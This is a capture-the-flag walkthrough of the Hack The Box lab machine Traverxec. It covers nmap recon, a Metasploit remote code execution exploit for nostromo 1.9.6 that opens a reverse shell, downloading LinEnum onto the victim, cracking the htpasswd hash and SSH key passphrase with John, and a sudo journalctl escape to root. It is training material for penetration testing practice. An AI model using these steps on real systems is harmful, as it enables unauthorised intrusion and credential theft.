# Traverxec ![](https://1376882418-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3F_z2GTZ6JS2CWL_B6%2F-M4cSf7qybmtla7vJgrn%2F-M4cT7oODPhCDvNRzr_r%2Ftraverexec.png?alt=media\&token=668cbba6-b701-4ea0-b754-3d6c268f06f3) Traverexec is a easy difficulty linux machine that's a good introduction to web to host exploitation as well as SSH usage ## Recon we start off by scanning Traverexec's IP `10.10.10.165` with `nmap` ``` nmap -T4 -A -v 10.10.10.165 ``` From our results we get the following ports and services ``` PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0) | ssh-hostkey: | 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA) | 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA) |_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519) 80/tcp open http nostromo 1.9.6 | http-methods: |_ Supported Methods: GET HEAD POST |_http-server-header: nostromo 1.9.6 |_http-title: TRAVERXEC ``` Right off we see that it's only running 2 services and we have potentially have the server service name `nostromo` We can use `searchsploit` to check if there are any existing exploits for nostromo V1.9.6 using `searchsploit nostromo` ``` ----------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Nostromo - Directory Traversal Remote Command Execution (Metasploit) | exploits/multiple/remote/47573.rb nostromo 1.9.6 - Remote Code Execution | exploits/multiple/remote/47837.py nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution | exploits/linux/remote/35466.sh ----------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- ``` Perfect we find that there's a RCE exploit for this version of `nostromo.` Now lets fire up Metsploit Framework with `msfconsole` and search for the exploit `search nostromo` ``` Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/http/nostromo_code_exec 2019-10-20 good Yes Nostromo Directory Traversal Remote Command Execution ``` Perfect! msf has the exploit we want to use now lets select and configure it ## Exploit ``` use exploit/multi/http/nostromo_code_exec set LHOST tun0 set RHOST 10.10.10.165 set RPORT 80 run ``` after a few seconds we should get the following ``` [*] Started reverse TCP handler on 10.10.15.64:4444 [*] Configuring Automatic (Unix In-Memory) target [*] Sending cmd/unix/reverse_perl command payload [*] Command shell session 1 opened (10.10.15.64:4444 -> 10.10.10.165:59272) at 2020-04-11 02:34:42 -0700 ``` Great! we have shell, unfortunately it's a limited shell but we can fix that up by upgrading it to a full `PTY` shell with `python -c 'import pty:pty.spawn("/bin/bash")'` Now with a full shell lets enumerate some more seeing as we are just a low privelage shell right now, we need to get user. To do this we will get LinEnum Once we have it, it's time to get it on the victim to do this we'll fire up `python -m simpleHTTPServer` and on the victim we'll do `wget IP Port/LinEnum.sh` once we have it we need to set it's permissions with `chmod +x LinEnum.sh` and then run it `./LinEnum.sh` Upon completetion we find one line that stands out ``` [-] htpasswd found - could contain passwords: /var/nostromo/conf/.htpasswd david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/ ``` We got a password hash!, coming back to our local machine, we'll put that hash into a file and run it through `John` ``` touch hash nano hash john --wordlist=/root/Downloads/Dic/rockyou.txt hash Nowonly4me (david) ``` Upon completion we get the password `Nowonly4me` Wee also see that within `/home/david/public_www`contains a folder `protected-file-area`which is protected by`.htaccess` checking `nostromo` documentation we see that there is yet another director we can access `~david` trying to access this directory gives us the following page ![](https://1376882418-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3F_z2GTZ6JS2CWL_B6%2F-M5eza8sbAlcNyrqtWL7%2F-M5f0R7IN9_yWeC0aw04%2FScreenshot_2020-04-24_00-10-01.png?alt=media\&token=5227343e-12e0-4143-8d54-a90dc3589462) Doesn't look very interesting does it? well typing in the url `10.10.10.165/~david/protected-file-area` gives us a auth screen and we already have the credentials for it `david:Nowonly4me` it takes us to a index page where we can download `backup-ssh-identity-files.tgz` Once downloaded we can extract the ssh keys it gives us the following files ``` /david/.ssh/ /david/.ssh/authorized_keys /david/.ssh/id_rsa /david/.ssh/id_rsa.pub ``` Unfortunately the `id_rsa` is encrypted but luckily we can pass it through `john` ``` python/usr/share/john/ssh2john.py ~/HTB/Traverexec/home/david/.ssh/id_rsa > ~/HTB/Traverexec/ssh.txt john ssh.txt --wordlist=~/Downloads/Dic/rockyou.txt hunter (/root/HTB/Traverexec/home/david/.ssh/id_rsa) ``` Great! we got the password `hunter` we can now use this with `id_rsa` to connect via ssh ``` ssh -i id_rsa david@10.10.10.165 ``` And With that we have User! ## Post Exploitation Checking David's home dir we find ``` david@traverxec:~/bin$ ls -ahlrs total 16K 4.0K -rwx------ 1 david david 363 Oct 25 16:26 server-stats.sh 4.0K -r-------- 1 david david 802 Oct 25 16:26 server-stats.head 4.0K drwx--x--x 5 david david 4.0K Oct 25 17:02 .. 4.0K drwx------ 2 david david 4.0K Oct 25 16:26 . ``` `server-stats.head` Gives us a banner not much useful, however checking `server-stats.sh` We get the following ``` #!/bin/bash cat /home/david/bin/server-stats.head echo "Load: `/usr/bin/uptime`" echo " " echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`" echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`" echo " " echo "Last 5 journal log lines:" /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat ``` The last line `/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat` shows us that `journalctl` is running as root, so can we exploit this? Yes we can! Checking GTFOBins we find that simply typing `!/bin/sh` from within `journalctl` can give us root access! `/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service` ``` Apr 24 01:05:26 traverxec sudo[807]: pam_unix(sudo:auth): auth could not identify password for [www-data] Apr 24 01:05:26 traverxec sudo[807]: www-data : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list Apr 24 01:48:40 traverxec sudo[1574]: pam_unix(sudo:auth): conversation failed Apr 24 01:48:40 traverxec sudo[1574]: pam_unix(sudo:auth): auth could not identify password for [www-data] Apr 24 01:48:40 traverxec sudo[1574]: www-data : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list !/bin/sh root@traverexec:/home/david/bin# cd /root/ root@traverexec:~# cat root.txt ``` ## Useful Links {% embed url="" %} {% embed url="" %}